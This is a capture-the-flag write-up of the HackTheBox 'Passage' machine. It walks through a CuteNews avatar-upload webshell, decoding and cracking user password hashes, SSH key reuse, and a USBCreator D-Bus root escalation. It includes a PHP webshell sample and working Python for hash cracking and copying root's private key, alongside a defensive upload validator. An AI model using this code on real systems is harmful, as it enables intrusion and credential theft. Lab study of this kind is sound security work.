Passage

Summary

Passage from HackTheBox is a medium-rated machine, fun but straightforward. It starts with two open ports, SSH on 22 and HTTP on 80. On the web server we find CuteNews (a free, easy-to-use news management system that uses flat files as its storage), which has an avatar upload vulnerability that gives us a shell on the box. From there we hunt for credentials and find a password hash for the user paul, who shares his private SSH key with the user nadav. Finally we find a vulnerable version of USBCreator installed and use it to escalate privileges to root.

Recon

Nmap

A full TCP nmap scan shows two open ports: 22 (SSH) and 80 (HTTP).

[screenshot: nmap full TCP scan]
We run a targeted nmap scan with the default scripts flag (-sC) and the version enumeration flag (-sV) against ports 22 and 80. From the Apache version we can guess this is Ubuntu Xenial.
[screenshot: nmap targeted scan]

Port 80

We check port 80 and find what looks like a blog with posts, titled Passage News.

[screenshot: checking port 80]
Looking at the page source reveals an e-mail address, nadav@passage.htb.
[screenshot: source code of the page on port 80]
Clicking on CuteNews/rss.php takes us to another page whose source tells us that this machine's IP address is associated with the domain http://passage.htb.
[screenshot: CuteNews/rss.php source]
We add passage.htb to /etc/hosts.
[screenshot: adding passage.htb to /etc/hosts]

Registering a user

Browsing the site further takes us to http://passage.htb/CuteNews, which is the login/registration page for CuteNews. Note: the version of CuteNews is revealed to be 2.1.2.

[screenshot: http://passage.htb/CuteNews]
Let's register a user to see what we get.
[screenshot: registering a user]
After registering we are logged in to the dashboard.
[screenshot: dashboard]

User shell

Uploading a shell (manual)

Clicking on Personal options takes us to our profile information. It looks normal, but what if we try to upload a PHP file instead of a picture in the avatar option? (Upload features are a common source of vulnerabilities.)

[screenshot: personal options of the user]
We create and upload a simple PHP file, p-shell.php, to get command execution on the server.
[screenshot: uploading the PHP file]
It looks like the PHP file was uploaded successfully.
[screenshot: PHP file uploaded successfully]
To find where our PHP file was stored, we right-click on the avatar and copy the image location.
[screenshot: copy image location]
We try to execute whoami and get a response back!
[screenshot: whoami command executed]
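The avatar upload above is the classic "trust the client's Content-Type / extension" bug. As an added example (my own code, not CuteNews's), here is the kind of weak check that lets p-shell.php through next to a server-side check that would have stopped it: one extension from an allowlist, magic bytes that match that extension, and no PHP open tag anywhere in the body (the GIF89a-prefixed webshell passes a magic-bytes check alone). The function and sample names are mine, and the sample bytes are constructed.

```python
import re
import secrets

# Added example, not code from CuteNews: a hardened avatar check next to the
# weak one. Sample bytes below are constructed for the demonstration.

# extension -> magic bytes the file must start with
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",            # covers GIF87a and GIF89a
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}
# PHP open tags (long, short, echo), script tags and SSI directives anywhere in the body
SERVER_CODE = re.compile(rb"<\?(php|=)|<\?\s|<script\b|<!--#", re.IGNORECASE)


def weak_check(filename: str, content_type: str) -> bool:
    """The kind of check that is bypassed above: it only looks at the Content-Type
    the client sent, which the attacker controls. A .php file with
    Content-Type: image/png sails through."""
    return content_type.startswith("image/")


def is_safe_avatar(filename: str, data: bytes) -> bool:
    """Server-side check: exactly one extension from the allowlist, body starts
    with that format's magic bytes, and no server-side code embedded in it."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False                      # rejects shell.php.png, shell.png.php, .php
    ext = "." + parts[1]
    magic = ALLOWED.get(ext)
    if magic is None or not data.startswith(magic):
        return False                      # unknown extension or header does not match it
    if SERVER_CODE.search(data):
        return False                      # GIF89a<?php ... ?> passes the magic check alone
    return True


def safe_storage_name(ext: str) -> str:
    """Never store under the client-supplied name: pick a random one and keep only
    the (already validated) extension."""
    return secrets.token_hex(16) + ext


# Constructed samples: a PNG header with padding, the webshell, and the GIF-prefixed webshell
PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SHELL = b"<?php system($_GET['cmd']); ?>"
GIF_SHELL = b"GIF89a" + SHELL

if __name__ == "__main__":
    for name, body in [("p-shell.php", SHELL), ("avatar.png", PNG), ("avatar.gif", GIF_SHELL)]:
        print(name, "weak:", weak_check(name, "image/png"), "hardened:", is_safe_avatar(name, body))
```

Even with this check in place, avatars should be written to a directory the web server will not execute PHP from (outside the document root, or with the PHP handler disabled for that path), since a validation bug is then a stored-image problem rather than remote code execution.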

User shell (automated)

That was the manual method, but someone has published a script on exploit-db that exploits CuteNews 2.1.2 automatically.

[screenshot: automatic exploit script]
We run the script with Python 3 and give it the IP address or domain name of the target; it drops a shell for us automatically. An interesting note: it also dumps the users' password hashes for us to crack.
[screenshot: shell obtained with the automatic script]
We continue our recon after obtaining a shell and find interesting PHP files in /var/www/html/CuteNews/cdata/users that contain base64-encoded user records, including password hashes.
[screenshot: interesting PHP files]

Finding hashes

After inspecting all the PHP files we hit the jackpot with b0.php.

[screenshot: b0.php]
We decode the base64 and find a hash for the user paul.
[screenshot: decoding the base64]
We try to crack that hash online at https://crackstation.net/ and get the password: atlanta1.
[screenshot: cracking the hash]
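Both the exploit script's hash dump and the manual b0.php decode above do the same thing: strip the PHP guard line, base64-decode the rest, and read the PHP-serialized array inside. As an added example (my own code, not the exploit-db script), the following does that offline and then runs the recovered hashes against a small wordlist, which is the local equivalent of the crackstation lookup. The sample file is constructed to mimic the layout of a cdata/users record (guard line, then base64 of a serialized array keyed by username); the records, e-mail values and wordlist are mine, and treating the hashes as unsalted sha256 hex is an assumption.

```python
import base64
import hashlib

# Added example, not the exploit script's code. The sample record below is
# constructed; only the file layout is modelled on what cdata/users/ holds.


def _unserialize(s: str, i: int = 0):
    """Minimal PHP unserialize() for the types these records use: N, b, i, s, a.
    Returns (value, offset just past it)."""
    t = s[i]
    if t == "N":                                   # N;
        return None, i + 2
    if t in "bi":                                  # b:1;  i:42;
        end = s.index(";", i)
        val = int(s[i + 2:end])
        return (bool(val) if t == "b" else val), end + 1
    if t == "s":                                   # s:LEN:"bytes";
        colon = s.index(":", i + 2)
        length = int(s[i + 2:colon])
        start = colon + 2                          # skip :"
        return s[start:start + length], start + length + 2   # skip ";
    if t == "a":                                   # a:COUNT:{key;value...}
        colon = s.index(":", i + 2)
        count = int(s[i + 2:colon])
        pos = colon + 2                            # skip :{
        out = {}
        for _ in range(count):
            key, pos = _unserialize(s, pos)
            out[key], pos = _unserialize(s, pos)
        return out, pos + 1                        # skip }
    raise ValueError(f"unsupported serialized type {t!r} at offset {i}")


def load_user_file(text: str) -> dict:
    """Drop the '<?php die(...); ?>' guard, base64-decode, unserialize."""
    _, _, blob = text.partition("?>")
    # latin-1 keeps one char per byte, so PHP's byte-based s:LEN stays correct
    raw = base64.b64decode(blob.strip()).decode("latin-1")
    records, _ = _unserialize(raw)
    return records


def extract_hashes(records: dict) -> dict:
    """username -> password hash for every record carrying a 'pass' field."""
    return {name: rec["pass"] for name, rec in records.items()
            if isinstance(rec, dict) and "pass" in rec}


def crack_sha256(hashes: dict, wordlist) -> dict:
    """Offline lookup: hash every candidate once, then match (assumes sha256 hex)."""
    table = {hashlib.sha256(w.encode()).hexdigest(): w for w in wordlist}
    return {name: table[h] for name, h in hashes.items() if h in table}


# ---- constructed sample, built with PHP's serialize() syntax ----
def _s(v: str) -> str:
    return f's:{len(v.encode())}:"{v}";'


PAUL_HASH = hashlib.sha256(b"atlanta1").hexdigest()          # the password cracked above
NADAV_HASH = hashlib.sha256(b"made-up-and-not-in-wordlist").hexdigest()
SERIALIZED = (
    "a:2:{"
    + _s("paul") + "a:2:{" + _s("email") + _s("paul@passage.htb")
    + _s("pass") + _s(PAUL_HASH) + "}"
    + _s("nadav") + "a:2:{" + _s("email") + _s("nadav@passage.htb")
    + _s("pass") + _s(NADAV_HASH) + "}"
    + "}"
)
SAMPLE_B0_PHP = ("<?php die('Direct call - access denied'); ?>\n"
                 + base64.b64encode(SERIALIZED.encode()).decode())
WORDLIST = ["password", "123456", "atlanta1", "letmein"]   # constructed

if __name__ == "__main__":
    hashes = extract_hashes(load_user_file(SAMPLE_B0_PHP))
    for user, h in hashes.items():
        print(f"{user}:{h}")
    print("cracked:", crack_sha256(hashes, WORDLIST))
```

A real record has more fields (and other files under cdata/users are indexes keyed by e-mail or id rather than username), which is why extract_hashes only keeps entries that actually carry a pass field instead of assuming every key is a user.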

Su as paul

We su to paul and get in.

[screenshot: su as paul]
A little investigation of paul's home directory turns up a .ssh directory containing a private key. Perhaps paul and nadav share the key, so let's try it to log in as nadav.
[screenshot: finding the .ssh directory]

Login as nadav

Trying the private key to log in as nadav.

[screenshot: login as nadav]

Root shell

Now let's use linpeas.sh to try to find a way to escalate to root.

[screenshot: getting linpeas.sh]
Interestingly, linpeas.sh found a vulnerable version of USBCreator installed on the system.
[screenshot: a vulnerable version of USBCreator]
A quick Google search finds an article that explains the vulnerability and how to exploit it.
[screenshot: article about the vulnerability]
After replicating the steps in the article we obtain the root user's private key and use it to log in.
[screenshot: root shell]
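The page only refers to "an article", so as an added example here is the step it describes, in my own Python wrapper rather than the article's commands: the usb-creator helper exposes a system D-Bus method, com.ubuntu.USBCreator.Image, that copies an arbitrary source path to an arbitrary destination as root, and its only authorization check is that the caller is an admin (a member of the sudo group), with no password prompt. Calling it through gdbus with /root/.ssh/id_rsa as the source is what yields root's private key. The precondition checks, function names and the destination path are mine, and the sudo-group requirement is stated here as an assumption taken from the public write-up of the bug.

```python
import grp
import os
import pwd
import subprocess
from pathlib import Path
from typing import List, Optional

# Added example, my own wrapper around the documented gdbus call; not the
# article's script. D-Bus names below are the helper's real identifiers.
DBUS_DEST = "com.ubuntu.USBCreator"
DBUS_PATH = "/com/ubuntu/USBCreator"
DBUS_METHOD = "com.ubuntu.USBCreator.Image"
SERVICE_FILE = "usr/share/dbus-1/system-services/com.ubuntu.USBCreator.service"


def usbcreator_service_present(root: str = "/") -> bool:
    """True if the system-bus activation file for the helper exists under root
    (root is a parameter only so the check can be pointed at a mounted image)."""
    return Path(root, SERVICE_FILE).is_file()


def in_sudo_group(username: Optional[str] = None) -> bool:
    """Assumption from the write-up: the helper accepts any caller in the sudo
    group and asks for no password. Checks supplementary membership only."""
    user = username or pwd.getpwuid(os.getuid()).pw_name
    try:
        return user in grp.getgrnam("sudo").gr_mem
    except KeyError:               # no sudo group on this system
        return False


def gdbus_image_command(src: str, dst: str) -> List[str]:
    """argv for the Image call: the helper copies src to dst as root.
    The trailing 'true' is the method's allow_unsafe boolean argument."""
    return ["gdbus", "call", "--system",
            "--dest", DBUS_DEST,
            "--object-path", DBUS_PATH,
            "--method", DBUS_METHOD,
            src, dst, "true"]


def copy_as_root(src: str, dst: str) -> bool:
    """Run the call after checking the two preconditions; True if dst appeared."""
    if not usbcreator_service_present():
        raise RuntimeError("usb-creator D-Bus service is not installed")
    if not in_sudo_group():
        raise RuntimeError("caller is not in the sudo group; the helper will refuse")
    result = subprocess.run(gdbus_image_command(src, dst),
                            capture_output=True, text=True)
    if result.returncode != 0:
        print(result.stderr.strip())
    return result.returncode == 0 and Path(dst).is_file()


if __name__ == "__main__":
    # dst path is my choice; the copy is made by root, so chmod 600 before use
    if copy_as_root("/root/.ssh/id_rsa", "/tmp/root_id_rsa"):
        os.chmod("/tmp/root_id_rsa", 0o600)
        print("got key: ssh -i /tmp/root_id_rsa root@passage.htb")
```

The same call works in the other direction (writing an attacker-controlled file to a root-owned path), which is why the fix was to put a polkit authorization check in front of the method rather than to restrict source paths.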
Thank you for reading, and I hope this article was enjoyable and helpful.